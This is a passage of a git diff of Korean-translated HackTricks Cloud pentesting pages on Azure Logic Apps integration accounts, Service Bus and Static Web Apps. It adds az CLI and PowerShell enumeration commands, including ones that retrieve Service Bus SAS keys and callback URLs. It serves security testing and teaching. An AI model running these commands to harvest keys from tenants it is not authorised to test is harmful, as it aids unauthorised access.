ํŒŒํŠธ๋„ˆ ์ •๋ณด๋ฅผ ๊ด€๋ฆฌํ•˜์—ฌ ์›ํ™œํ•œ ํ†ตํ•ฉ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. +* ๊ณ„์•ฝ: ๊ฑฐ๋ž˜ ํŒŒํŠธ๋„ˆ์™€ ๋ฐ์ดํ„ฐ ๊ตํ™˜์„ ์œ„ํ•œ ๊ทœ์น™ ๋ฐ ์„ค์ •์„ ๊ตฌ์„ฑํ•ฉ๋‹ˆ๋‹ค (์˜ˆ: EDI, AS2). +* ๋ฐฐ์น˜ ๊ตฌ์„ฑ: ๋ฉ”์‹œ์ง€๋ฅผ ํšจ์œจ์ ์œผ๋กœ ๊ทธ๋ฃนํ™”ํ•˜๊ณ  ์ฒ˜๋ฆฌํ•˜๊ธฐ ์œ„ํ•œ ๋ฐฐ์น˜ ์ฒ˜๋ฆฌ ๊ตฌ์„ฑ์„ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. +* RosettaNet PIP: B2B ํ†ต์‹ ์„ ํ‘œ์ค€ํ™”ํ•˜๊ธฐ ์œ„ํ•ด RosettaNet ํŒŒํŠธ๋„ˆ ์ธํ„ฐํŽ˜์ด์Šค ํ”„๋กœ์„ธ์Šค(PIPs)๋ฅผ ๊ตฌ์„ฑํ•ฉ๋‹ˆ๋‹ค. + +#### ์—ด๊ฑฐ + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} +```bash +# Integration account +az logic integration-account list --resource-group +az logic integration-account show --resource-group --name +az logic integration-account list-callback-url --resource-group --integration-account-name + +# Batch-configuration +az logic integration-account batch-configuration list \ +--resource-group \ +--integration-account-name + +az logic integration-account batch-configuration show \ +--resource-group \ +--integration-account-name \ +--batch-configuration-name + +# Map +az logic integration-account map list \ +--resource-group \ +--integration-account + +az logic integration-account map show \ +--resource-group \ +--integration-account \ +--map-name + +# Partner +az logic integration-account partner list \ +--resource-group \ +--integration-account + +az logic integration-account partner show \ +--resource-group \ +--integration-account \ +--name + +# Session +az logic integration-account session list \ +--resource-group \ +--integration-account + +az logic integration-account session show \ +--resource-group \ +--integration-account \ +--name + +# Assembly +# Session +az logic integration-account assembly list \ +--resource-group \ +--integration-account + +az logic integration-account assembly show \ +--resource-group \ +--integration-account \ +--assembly-artifact-name + + +``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.LogicApp + +# Retrieve details of an integration account +Get-AzIntegrationAccount -ResourceGroupName -Name + +# Retrieve the callback URL of an integration account +Get-AzIntegrationAccountCallbackUrl -ResourceGroupName -IntegrationAccountName + +# Retrieve details of a specific agreement in an integration account +Get-AzIntegrationAccountAgreement -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific assembly in an integration account +Get-AzIntegrationAccountAssembly -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific batch configuration in an integration account +Get-AzIntegrationAccountBatchConfiguration -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific certificate in an integration account +Get-AzIntegrationAccountCertificate -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific map in an integration account +Get-AzIntegrationAccountMap -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific partner in an integration account +Get-AzIntegrationAccountPartner -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific schema in an integration account +Get-AzIntegrationAccountSchema -ResourceGroupName -IntegrationAccountName -Name +``` +{% endcode %} +{% endtab %} +{% endtabs %} + + +## ๊ถŒํ•œ ์ƒ์Šน + +๋กœ์ง ์•ฑ ๊ถŒํ•œ ์ƒ์Šน๊ณผ ๋™์ผ: + +{% content-ref url="../az-privilege-escalation/az-logic-apps-privesc.md" %} +[az-logic-apps-privesc.md](../az-privilege-escalation/az-logic-apps-privesc.md) +{% endcontent-ref %} + +## ํฌ์ŠคํŠธ ์ต์Šคํ”Œ๋กœ์ž‡ + +{% content-ref url="../az-post-exploitation/az-logic-apps-post-exploitation.md" %} +[az-logic-apps-post-exploitation.md](../az-post-exploitation/az-logic-apps-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks ์ง€์›ํ•˜๊ธฐ + +* [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! +* **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** +* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŒ์„ ๊ณต์œ ํ•˜์„ธ์š”.** + +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md index 85c3e9219..8e9efbf22 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md +++ b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md @@ -4,28 +4,28 @@ ## Service Bus -Azure Service Bus๋Š” **์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋‹ค์–‘ํ•œ ๋ถ€๋ถ„ ๋˜๋Š” ๋ณ„๋„์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐ„์˜ ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” **ํ†ต์‹ ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜๊ธฐ ์œ„ํ•ด ์„ค๊ณ„๋œ ํด๋ผ์šฐ๋“œ ๊ธฐ๋ฐ˜ **๋ฉ”์‹œ์ง• ์„œ๋น„์Šค**์ž…๋‹ˆ๋‹ค. ์ด๋Š” ์•ˆ์ „ํ•œ ์ค‘๊ฐœ์ž๋กœ ์ž‘์šฉํ•˜์—ฌ ๋ฐœ์‹ ์ž์™€ ์ˆ˜์‹ ์ž๊ฐ€ ๋™์‹œ์— ์ž‘๋™ํ•˜์ง€ ์•Š๋”๋ผ๋„ ๋ฉ”์‹œ์ง€๊ฐ€ ์•ˆ์ „ํ•˜๊ฒŒ ์ „๋‹ฌ๋˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. ์‹œ์Šคํ…œ์„ ๋ถ„๋ฆฌํ•จ์œผ๋กœ์จ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ๋…๋ฆฝ์ ์œผ๋กœ ์ž‘๋™ํ•˜๋ฉด์„œ๋„ ๋ฐ์ดํ„ฐ๋‚˜ ์ง€์นจ์„ ๊ตํ™˜ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์—ฌ๋Ÿฌ ์ž‘์—…์ž ๊ฐ„์˜ ๋ถ€ํ•˜ ๋ถ„์‚ฐ, ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋ฉ”์‹œ์ง€ ์ „๋‹ฌ ๋˜๋Š” ์ˆœ์„œ๋Œ€๋กœ ์ž‘์—…์„ ์ฒ˜๋ฆฌํ•˜๊ฑฐ๋‚˜ ์•ˆ์ „ํ•˜๊ฒŒ ์•ก์„ธ์Šค๋ฅผ ๊ด€๋ฆฌํ•˜๋Š” ๊ฒƒ๊ณผ ๊ฐ™์€ ๋ณต์žกํ•œ ์กฐ์ •์ด ํ•„์š”ํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค์— ํŠนํžˆ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค. +Azure Service Bus๋Š” **์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋‹ค์–‘ํ•œ ๋ถ€๋ถ„ ๋˜๋Š” ๋ณ„๋„์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐ„์˜ ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” **ํ†ต์‹ ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•˜๊ธฐ ์œ„ํ•ด ์„ค๊ณ„๋œ ํด๋ผ์šฐ๋“œ ๊ธฐ๋ฐ˜ **๋ฉ”์‹œ์ง• ์„œ๋น„์Šค**์ž…๋‹ˆ๋‹ค. ์ด๋Š” ์•ˆ์ „ํ•œ ์ค‘๊ฐœ์ž๋กœ ์ž‘์šฉํ•˜์—ฌ ๋ฐœ์‹ ์ž์™€ ์ˆ˜์‹ ์ž๊ฐ€ ๋™์‹œ์— ์ž‘๋™ํ•˜์ง€ ์•Š๋”๋ผ๋„ ๋ฉ”์‹œ์ง€๊ฐ€ ์•ˆ์ „ํ•˜๊ฒŒ ์ „๋‹ฌ๋˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. ์‹œ์Šคํ…œ์„ ๋ถ„๋ฆฌํ•จ์œผ๋กœ์จ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ๋…๋ฆฝ์ ์œผ๋กœ ์ž‘๋™ํ•˜๋ฉด์„œ๋„ ๋ฐ์ดํ„ฐ๋‚˜ ์ง€์นจ์„ ๊ตํ™˜ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์—ฌ๋Ÿฌ ์ž‘์—…์ž ๊ฐ„์˜ ๋ถ€ํ•˜ ๋ถ„์‚ฐ, ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ๋ฉ”์‹œ์ง€ ์ „๋‹ฌ ๋˜๋Š” ์ž‘์—…์„ ์ˆœ์„œ๋Œ€๋กœ ์ฒ˜๋ฆฌํ•˜๊ฑฐ๋‚˜ ์•ˆ์ „ํ•˜๊ฒŒ ์ ‘๊ทผ์„ ๊ด€๋ฆฌํ•˜๋Š” ๊ฒƒ๊ณผ ๊ฐ™์€ ๋ณต์žกํ•œ ์กฐ์ •์ด ํ•„์š”ํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค์— ํŠนํžˆ ์œ ์šฉํ•ฉ๋‹ˆ๋‹ค. ### Key Concepts 1. **Queues:** ๊ทธ ๋ชฉ์ ์€ ์ˆ˜์‹ ์ž๊ฐ€ ์ค€๋น„๋  ๋•Œ๊นŒ์ง€ ๋ฉ”์‹œ์ง€๋ฅผ ์ €์žฅํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. -- ๋ฉ”์‹œ์ง€๋Š” ์ •๋ ฌ๋˜๊ณ , ํƒ€์ž„์Šคํƒฌํ”„๊ฐ€ ์ฐํžˆ๋ฉฐ, ๋‚ด๊ตฌ์„ฑ ์žˆ๊ฒŒ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. +- ๋ฉ”์‹œ์ง€๋Š” ์ˆœ์„œ๊ฐ€ ์žˆ์œผ๋ฉฐ, ํƒ€์ž„์Šคํƒฌํ”„๊ฐ€ ๋ถ™๊ณ , ๋‚ด๊ตฌ์„ฑ์ด ์žˆ๊ฒŒ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. - ํ’€ ๋ชจ๋“œ(์š”์ฒญ ์‹œ ๊ฒ€์ƒ‰)๋กœ ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค. - ํฌ์ธํŠธ ํˆฌ ํฌ์ธํŠธ ํ†ต์‹ ์„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. 2. **Topics:** ๋ฐฉ์†ก์„ ์œ„ํ•œ ๊ฒŒ์‹œ-๊ตฌ๋… ๋ฉ”์‹œ์ง•์ž…๋‹ˆ๋‹ค. - ์—ฌ๋Ÿฌ ๋…๋ฆฝ์ ์ธ ๊ตฌ๋…์ด ๋ฉ”์‹œ์ง€์˜ ๋ณต์‚ฌ๋ณธ์„ ์ˆ˜์‹ ํ•ฉ๋‹ˆ๋‹ค. - ๊ตฌ๋…์€ ์ „๋‹ฌ์„ ์ œ์–ดํ•˜๊ฑฐ๋‚˜ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ๋ฅผ ์ถ”๊ฐ€ํ•˜๊ธฐ ์œ„ํ•œ ๊ทœ์น™/ํ•„ํ„ฐ๋ฅผ ๊ฐ€์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - ๋‹ค๋Œ€๋‹ค ํ†ต์‹ ์„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. -3. **Namespaces:** ๋ชจ๋“  ๋ฉ”์‹œ์ง• ๊ตฌ์„ฑ ์š”์†Œ, ํ ๋ฐ ์ฃผ์ œ๋ฅผ ์œ„ํ•œ ์ปจํ…Œ์ด๋„ˆ๋กœ, ๊ฐ•๋ ฅํ•œ Azure ํด๋Ÿฌ์Šคํ„ฐ์˜ ์ž์‹ ์˜ ์Šฌ๋ผ์ด์Šค์™€ ๊ฐ™์œผ๋ฉฐ, ์ „์šฉ ์šฉ๋Ÿ‰์„ ์ œ๊ณตํ•˜๊ณ  ์„ ํƒ์ ์œผ๋กœ ์„ธ ๊ฐœ์˜ ๊ฐ€์šฉ์„ฑ ์˜์—ญ์— ๊ฑธ์ณ ํ™•์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +3. **Namespaces:** ๋ชจ๋“  ๋ฉ”์‹œ์ง• ๊ตฌ์„ฑ ์š”์†Œ, ํ ๋ฐ ์ฃผ์ œ๋ฅผ ์œ„ํ•œ ์ปจํ…Œ์ด๋„ˆ๋กœ, ๊ฐ•๋ ฅํ•œ Azure ํด๋Ÿฌ์Šคํ„ฐ์˜ ์ž์‹ ์˜ ์กฐ๊ฐ๊ณผ ๊ฐ™์œผ๋ฉฐ, ์ „์šฉ ์šฉ๋Ÿ‰์„ ์ œ๊ณตํ•˜๊ณ  ์„ ํƒ์ ์œผ๋กœ ์„ธ ๊ฐœ์˜ ๊ฐ€์šฉ์„ฑ ์˜์—ญ์— ๊ฑธ์ณ ์žˆ์Šต๋‹ˆ๋‹ค. ### Advance Features ์ผ๋ถ€ ๊ณ ๊ธ‰ ๊ธฐ๋Šฅ์€ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค: - **Message Sessions**: FIFO ์ฒ˜๋ฆฌ๋ฅผ ๋ณด์žฅํ•˜๊ณ  ์š”์ฒญ-์‘๋‹ต ํŒจํ„ด์„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. -- **Auto-Forwarding**: ๋™์ผํ•œ ๋„ค์ž„์ŠคํŽ˜์ด์Šค ๋‚ด์—์„œ ํ ๋˜๋Š” ์ฃผ์ œ ๊ฐ„์— ๋ฉ”์‹œ์ง€๋ฅผ ์ „์†กํ•ฉ๋‹ˆ๋‹ค. +- **Auto-Forwarding**: ๋™์ผํ•œ ๋„ค์ž„์ŠคํŽ˜์ด์Šค ๋‚ด์—์„œ ํ ๋˜๋Š” ์ฃผ๊ฐ„ ๋ฉ”์‹œ์ง€๋ฅผ ์ „์†กํ•ฉ๋‹ˆ๋‹ค. - **Dead-Lettering**: ๋ฐฐ๋‹ฌํ•  ์ˆ˜ ์—†๋Š” ๋ฉ”์‹œ์ง€๋ฅผ ๊ฒ€ํ† ๋ฅผ ์œ„ํ•ด ์บก์ฒ˜ํ•ฉ๋‹ˆ๋‹ค. -- **Scheduled Delivery**: ๋ฏธ๋ž˜์˜ ์ž‘์—…์„ ์œ„ํ•ด ๋ฉ”์‹œ์ง€ ์ฒ˜๋ฆฌ๋ฅผ ์ง€์—ฐ์‹œํ‚ต๋‹ˆ๋‹ค. +- **Scheduled Delivery**: ๋ฏธ๋ž˜ ์ž‘์—…์„ ์œ„ํ•ด ๋ฉ”์‹œ์ง€ ์ฒ˜๋ฆฌ๋ฅผ ์ง€์—ฐ์‹œํ‚ต๋‹ˆ๋‹ค. - **Message Deferral**: ์ค€๋น„๋  ๋•Œ๊นŒ์ง€ ๋ฉ”์‹œ์ง€ ๊ฒ€์ƒ‰์„ ์—ฐ๊ธฐํ•ฉ๋‹ˆ๋‹ค. - **Transactions**: ์ž‘์—…์„ ์›์ž์  ์‹คํ–‰์œผ๋กœ ๊ทธ๋ฃนํ™”ํ•ฉ๋‹ˆ๋‹ค. - **Filters & Actions**: ๋ฉ”์‹œ์ง€๋ฅผ ํ•„ํ„ฐ๋งํ•˜๊ฑฐ๋‚˜ ์ฃผ์„์„ ์ถ”๊ฐ€ํ•˜๊ธฐ ์œ„ํ•œ ๊ทœ์น™์„ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. @@ -35,13 +35,13 @@ Azure Service Bus๋Š” **์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋‹ค์–‘ํ•œ ๋ถ€๋ถ„ ๋˜๋Š” ๋ณ„๋„์˜ ### Authorization-Rule / SAS Policy -SAS ์ •์ฑ…์€ Azure Service Bus ์—”ํ„ฐํ‹ฐ ๋„ค์ž„์ŠคํŽ˜์ด์Šค(๊ฐ€์žฅ ์ค‘์š”ํ•œ ๊ฒƒ), ํ ๋ฐ ์ฃผ์ œ์— ๋Œ€ํ•œ ์•ก์„ธ์Šค ๊ถŒํ•œ์„ ์ •์˜ํ•ฉ๋‹ˆ๋‹ค. ๊ฐ ์ •์ฑ…์€ ๋‹ค์Œ ๊ตฌ์„ฑ ์š”์†Œ๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค: +SAS ์ •์ฑ…์€ Azure Service Bus ์—”ํ„ฐํ‹ฐ ๋„ค์ž„์ŠคํŽ˜์ด์Šค(๊ฐ€์žฅ ์ค‘์š”ํ•œ ๊ฒƒ), ํ ๋ฐ ์ฃผ์ œ์— ๋Œ€ํ•œ ์ ‘๊ทผ ๊ถŒํ•œ์„ ์ •์˜ํ•ฉ๋‹ˆ๋‹ค. ๊ฐ ์ •์ฑ…์€ ๋‹ค์Œ ๊ตฌ์„ฑ ์š”์†Œ๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค: -- **Permissions**: ์•ก์„ธ์Šค ์ˆ˜์ค€์„ ์ง€์ •ํ•˜๊ธฐ ์œ„ํ•œ ์ฒดํฌ๋ฐ•์Šค: +- **Permissions**: ์ ‘๊ทผ ์ˆ˜์ค€์„ ์ง€์ •ํ•˜๋Š” ์ฒดํฌ๋ฐ•์Šค: - Manage: ์—”ํ„ฐํ‹ฐ์— ๋Œ€ํ•œ ์ „์ฒด ์ œ์–ด๋ฅผ ๋ถ€์—ฌํ•˜๋ฉฐ, ๊ตฌ์„ฑ ๋ฐ ๊ถŒํ•œ ๊ด€๋ฆฌ๋ฅผ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. - Send: ์—”ํ„ฐํ‹ฐ์— ๋ฉ”์‹œ์ง€๋ฅผ ์ „์†กํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - Listen: ์—”ํ„ฐํ‹ฐ๋กœ๋ถ€ํ„ฐ ๋ฉ”์‹œ์ง€๋ฅผ ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- **Primary and Secondary Keys**: ์•ก์„ธ์Šค ์ธ์ฆ์„ ์œ„ํ•œ ๋ณด์•ˆ ํ† ํฐ์„ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ์•”ํ˜ธํ™” ํ‚ค์ž…๋‹ˆ๋‹ค. +- **Primary and Secondary Keys**: ์ ‘๊ทผ ์ธ์ฆ์„ ์œ„ํ•œ ๋ณด์•ˆ ํ† ํฐ์„ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋˜๋Š” ์•”ํ˜ธํ™” ํ‚ค์ž…๋‹ˆ๋‹ค. - **Primary and Secondary Connection Strings**: ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ ์‰ฝ๊ฒŒ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋„๋ก ์—”๋“œํฌ์ธํŠธ์™€ ํ‚ค๋ฅผ ํฌํ•จํ•œ ๋ฏธ๋ฆฌ ๊ตฌ์„ฑ๋œ ์—ฐ๊ฒฐ ๋ฌธ์ž์—ด์ž…๋‹ˆ๋‹ค. - **SAS Policy ARM ID**: ํ”„๋กœ๊ทธ๋ž˜๋ฐ์  ์‹๋ณ„์„ ์œ„ํ•œ ์ •์ฑ…์˜ Azure Resource Manager (ARM) ๊ฒฝ๋กœ์ž…๋‹ˆ๋‹ค. @@ -50,6 +50,10 @@ SAS ์ •์ฑ…์€ Azure Service Bus ์—”ํ„ฐํ‹ฐ ๋„ค์ž„์ŠคํŽ˜์ด์Šค(๊ฐ€์žฅ ์ค‘์š”ํ•œ sku, authrorization rule, ### Enumeration + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # Queue Enumeration az servicebus queue list --resource-group --namespace-name @@ -77,6 +81,58 @@ az servicebus queue authorization-rule list --resource-group - az servicebus topic authorization-rule list --resource-group --namespace-name --topic-name az servicebus namespace authorization-rule keys list --resource-group --namespace-name --name ``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.ServiceBus + +# Retrieves details of a Service Bus namespace, including V2-specific features like additional metrics or configurations. +Get-AzServiceBusNamespaceV2 -ResourceGroupName -Name + +# Retrieves the authorization rules for a Service Bus namespace, queue, or topic. +Get-AzServiceBusAuthorizationRule -ResourceGroupName -NamespaceName + +# Retrieves the Geo-Disaster Recovery configuration for a Service Bus namespace, if it is enabled. +Get-AzServiceBusGeoDRConfiguration -ResourceGroupName -NamespaceName + +# Retrieves the shared access keys for a specified authorization rule in a Service Bus namespace. +Get-AzServiceBusKey -ResourceGroupName -NamespaceName -Name + +# Retrieves the migration state and details for a Service Bus namespace, if a migration is in progress. +Get-AzServiceBusMigration -ResourceGroupName -NamespaceName + +# Retrieves properties and details about a Service Bus namespace. +Get-AzServiceBusNamespace -ResourceGroupName -Name + +# Retrieves the network rule set for a Service Bus namespace, such as IP restrictions or virtual network access rules. +Get-AzServiceBusNetworkRuleSet -ResourceGroupName -NamespaceName + +# Retrieves private endpoint connections for a Service Bus namespace. +Get-AzServiceBusPrivateEndpointConnection -ResourceGroupName -NamespaceName + +# Retrieves private link resources associated with a Service Bus namespace. +Get-AzServiceBusPrivateLink -ResourceGroupName -NamespaceName + +# Retrieves details of a specified queue in a Service Bus namespace. +Get-AzServiceBusQueue -ResourceGroupName -NamespaceName -Name + +# Retrieves rules (filters and actions) for a subscription under a Service Bus topic. +Get-AzServiceBusRule -ResourceGroupName -NamespaceName -TopicName -SubscriptionName + +# Retrieves details of subscriptions for a specified Service Bus topic. +Get-AzServiceBusSubscription -ResourceGroupName -NamespaceName -TopicName + +# Retrieves details of a specified topic in a Service Bus namespace. +Get-AzServiceBusTopic -ResourceGroupName -NamespaceName +``` +{% endcode %} +{% endtab %} +{% endtabs %} + + ### ๊ถŒํ•œ ์ƒ์Šน {{#ref}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md index 270d7a0ad..e7cc4bbd7 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md @@ -4,16 +4,16 @@ ## Static Web Apps Basic Information -Azure Static Web Apps๋Š” **GitHub์™€ ๊ฐ™์€ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์—์„œ ์ž๋™ CI/CD๋ฅผ ํ†ตํ•ด ์ •์  ์›น ์•ฑ์„ ํ˜ธ์ŠคํŒ…ํ•˜๋Š” ํด๋ผ์šฐ๋“œ ์„œ๋น„์Šค**์ž…๋‹ˆ๋‹ค. ๊ธ€๋กœ๋ฒŒ ์ฝ˜ํ…์ธ  ์ „์†ก, ์„œ๋ฒ„๋ฆฌ์Šค ๋ฐฑ์—”๋“œ ๋ฐ ๋‚ด์žฅ HTTPS๋ฅผ ์ œ๊ณตํ•˜์—ฌ ์•ˆ์ „ํ•˜๊ณ  ํ™•์žฅ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ์„œ๋น„์Šค๊ฐ€ "์ •์ "์ด๋ผ๊ณ  ํ•ด์„œ ์™„์ „ํžˆ ์•ˆ์ „ํ•˜๋‹ค๋Š” ์˜๋ฏธ๋Š” ์•„๋‹™๋‹ˆ๋‹ค. ์œ„ํ—˜ ์š”์†Œ๋กœ๋Š” ์ž˜๋ชป ๊ตฌ์„ฑ๋œ CORS, ๋ถˆ์ถฉ๋ถ„ํ•œ ์ธ์ฆ ๋ฐ ์ฝ˜ํ…์ธ  ๋ณ€์กฐ๊ฐ€ ์žˆ์œผ๋ฉฐ, ์ ์ ˆํžˆ ๊ด€๋ฆฌ๋˜์ง€ ์•Š์œผ๋ฉด XSS ๋ฐ ๋ฐ์ดํ„ฐ ์œ ์ถœ๊ณผ ๊ฐ™์€ ๊ณต๊ฒฉ์— ๋…ธ์ถœ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +Azure Static Web Apps๋Š” **GitHub์™€ ๊ฐ™์€ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์—์„œ ์ž๋™ CI/CD๋ฅผ ํ†ตํ•ด ์ •์  ์›น ์•ฑ์„ ํ˜ธ์ŠคํŒ…ํ•˜๋Š” ํด๋ผ์šฐ๋“œ ์„œ๋น„์Šค**์ž…๋‹ˆ๋‹ค. ์ „ ์„ธ๊ณ„ ์ฝ˜ํ…์ธ  ๋ฐฐํฌ, ์„œ๋ฒ„๋ฆฌ์Šค ๋ฐฑ์—”๋“œ ๋ฐ ๋‚ด์žฅ HTTPS๋ฅผ ์ œ๊ณตํ•˜์—ฌ ์•ˆ์ „ํ•˜๊ณ  ํ™•์žฅ ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ์„œ๋น„์Šค๊ฐ€ "์ •์ "์ด๋ผ๊ณ  ํ•ด์„œ ์™„์ „ํžˆ ์•ˆ์ „ํ•˜๋‹ค๋Š” ์˜๋ฏธ๋Š” ์•„๋‹™๋‹ˆ๋‹ค. ์œ„ํ—˜ ์š”์†Œ๋กœ๋Š” ์ž˜๋ชป ๊ตฌ์„ฑ๋œ CORS, ๋ถˆ์ถฉ๋ถ„ํ•œ ์ธ์ฆ ๋ฐ ์ฝ˜ํ…์ธ  ๋ณ€์กฐ๊ฐ€ ์žˆ์œผ๋ฉฐ, ์ ์ ˆํžˆ ๊ด€๋ฆฌ๋˜์ง€ ์•Š์œผ๋ฉด XSS ๋ฐ ๋ฐ์ดํ„ฐ ์œ ์ถœ๊ณผ ๊ฐ™์€ ๊ณต๊ฒฉ์— ๋…ธ์ถœ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ### Deployment Authentication > [!TIP] > Static App์ด ์ƒ์„ฑ๋  ๋•Œ **๋ฐฐํฌ ์ธ์ฆ ์ •์ฑ…**์œผ๋กœ **๋ฐฐํฌ ํ† ํฐ**๊ณผ **GitHub Actions ์›Œํฌํ”Œ๋กœ์šฐ** ์ค‘์—์„œ ์„ ํƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- **๋ฐฐํฌ ํ† ํฐ**: ํ† ํฐ์ด ์ƒ์„ฑ๋˜์–ด ๋ฐฐํฌ ํ”„๋กœ์„ธ์Šค๋ฅผ ์ธ์ฆํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. **์ด ํ† ํฐ๋งŒ ์žˆ์œผ๋ฉด ์•ฑ์˜ ์ƒˆ ๋ฒ„์ „์„ ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๋ฆฌํฌ์ง€ํ† ๋ฆฌ๊ฐ€ ์—…๋ฐ์ดํŠธ๋  ๋•Œ๋งˆ๋‹ค ์•ฑ์˜ ์ƒˆ ๋ฒ„์ „์„ ๋ฐฐํฌํ•˜๊ธฐ ์œ„ํ•ด ๋น„๋ฐ€์— ํ† ํฐ์ด ํฌํ•จ๋œ **Github Action์ด ์ž๋™์œผ๋กœ ๋ฆฌํฌ์— ๋ฐฐํฌ๋ฉ๋‹ˆ๋‹ค**. -- **GitHub Actions ์›Œํฌํ”Œ๋กœ์šฐ**: ์ด ๊ฒฝ์šฐ ๋งค์šฐ ์œ ์‚ฌํ•œ Github Action์ด ๋ฆฌํฌ์— ๋ฐฐํฌ๋˜๋ฉฐ **ํ† ํฐ๋„ ๋น„๋ฐ€์— ์ 